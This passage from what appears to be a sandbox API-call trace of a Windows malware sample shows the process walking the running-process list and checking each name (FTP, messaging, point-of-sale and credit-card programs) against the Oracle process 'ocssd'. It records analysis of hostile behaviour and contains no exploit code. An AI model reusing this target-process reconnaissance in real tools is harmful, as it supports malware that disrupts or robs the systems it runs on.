lpString1="smartftp.exe") returned="smartftp.exe" [0092.755] StrStrIA (lpFirst="smartftp.exe", lpSrch="ocssd") returned 0x0 [0092.755] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0092.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.756] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35436a0 [0092.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x35436a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0092.756] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0092.756] StrStrIA (lpFirst="thunderbird.exe", lpSrch="ocssd") returned 0x0 [0092.756] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0092.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.758] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35436d0 [0092.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x35436d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0092.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0092.758] StrStrIA (lpFirst="totalcmd.exe", lpSrch="ocssd") returned 0x0 [0092.758] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0092.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.759] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35437d8 [0092.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x35437d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0092.759] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0092.759] StrStrIA (lpFirst="trillian.exe", lpSrch="ocssd") returned 0x0 [0092.759] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0092.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.761] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35437c0 [0092.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35437c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0092.761] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0092.761] StrStrIA (lpFirst="webdrive.exe", lpSrch="ocssd") returned 0x0 [0092.761] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0092.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.762] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35435f8 [0092.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x35435f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0092.762] StrStrIA (lpFirst="whatsapp.exe", lpSrch="ocssd") returned 0x0 [0092.762] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0092.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.764] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543808 [0092.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3543808, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0092.764] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0092.764] StrStrIA (lpFirst="winscp.exe", lpSrch="ocssd") returned 0x0 [0092.764] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0092.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.765] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3543338 [0092.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3543338, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0092.765] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0092.765] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="ocssd") returned 0x0 [0092.765] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0092.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.766] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3543458 [0092.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3543458, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0092.766] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0092.766] StrStrIA (lpFirst="active-charge.exe", lpSrch="ocssd") returned 0x0 [0092.767] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0092.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.768] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35436e8 [0092.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35436e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0092.769] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0092.769] StrStrIA (lpFirst="accupos.exe", lpSrch="ocssd") returned 0x0 [0092.769] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0092.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.770] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543820 [0092.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3543820, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0092.770] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0092.770] StrStrIA (lpFirst="afr38.exe", lpSrch="ocssd") returned 0x0 [0092.770] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0092.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.771] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543868 [0092.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3543868, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0092.772] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0092.772] StrStrIA (lpFirst="aldelo.exe", lpSrch="ocssd") returned 0x0 [0092.772] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0092.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0092.773] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3543610 [0092.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3543610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0092.773] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0092.773] StrStrIA (lpFirst="ccv_server.exe", lpSrch="ocssd") returned 0x0 [0092.773] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0092.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0092.774] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3543198 [0092.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3543198, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0092.774] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0092.774] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="ocssd") returned 0x0 [0092.774] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0092.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.776] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35432b8 [0092.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x35432b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0092.776] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0092.776] StrStrIA (lpFirst="creditservice.exe", lpSrch="ocssd") returned 0x0 [0092.776] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0092.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.777] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543790 [0092.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3543790, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0092.777] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0092.777] StrStrIA (lpFirst="edcsvr.exe", lpSrch="ocssd") returned 0x0 [0092.777] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0092.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.779] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3543898 [0092.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3543898, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0092.779] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0092.779] StrStrIA (lpFirst="fpos.exe", lpSrch="ocssd") returned 0x0 [0092.779] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0092.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.780] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35435b0 [0092.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35435b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0092.780] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0092.780] StrStrIA (lpFirst="isspos.exe", lpSrch="ocssd") returned 0x0 [0092.780] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0092.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.781] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35431f8 [0092.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x35431f8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0092.781] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0092.781] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="ocssd") returned 0x0 [0092.782] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0092.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.783] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35437a8 [0092.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x35437a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0092.783] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0092.783] StrStrIA (lpFirst="omnipos.exe", lpSrch="ocssd") returned 0x0 [0092.783] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0092.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.821] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35435e0 [0092.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x35435e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0092.821] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0092.821] StrStrIA (lpFirst="spcwin.exe", lpSrch="ocssd") returned 0x0 [0092.822] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0092.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.823] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3543318 [0092.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3543318, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0092.823] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0092.823] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="ocssd") returned 0x0 [0092.823] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0092.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.824] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3543a18 [0092.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3543a18, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0092.824] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0092.824] StrStrIA (lpFirst="utg2.exe", lpSrch="ocssd") returned 0x0 [0092.824] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0092.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.825] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543b80 [0092.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3543b80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0092.825] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0092.825] StrStrIA 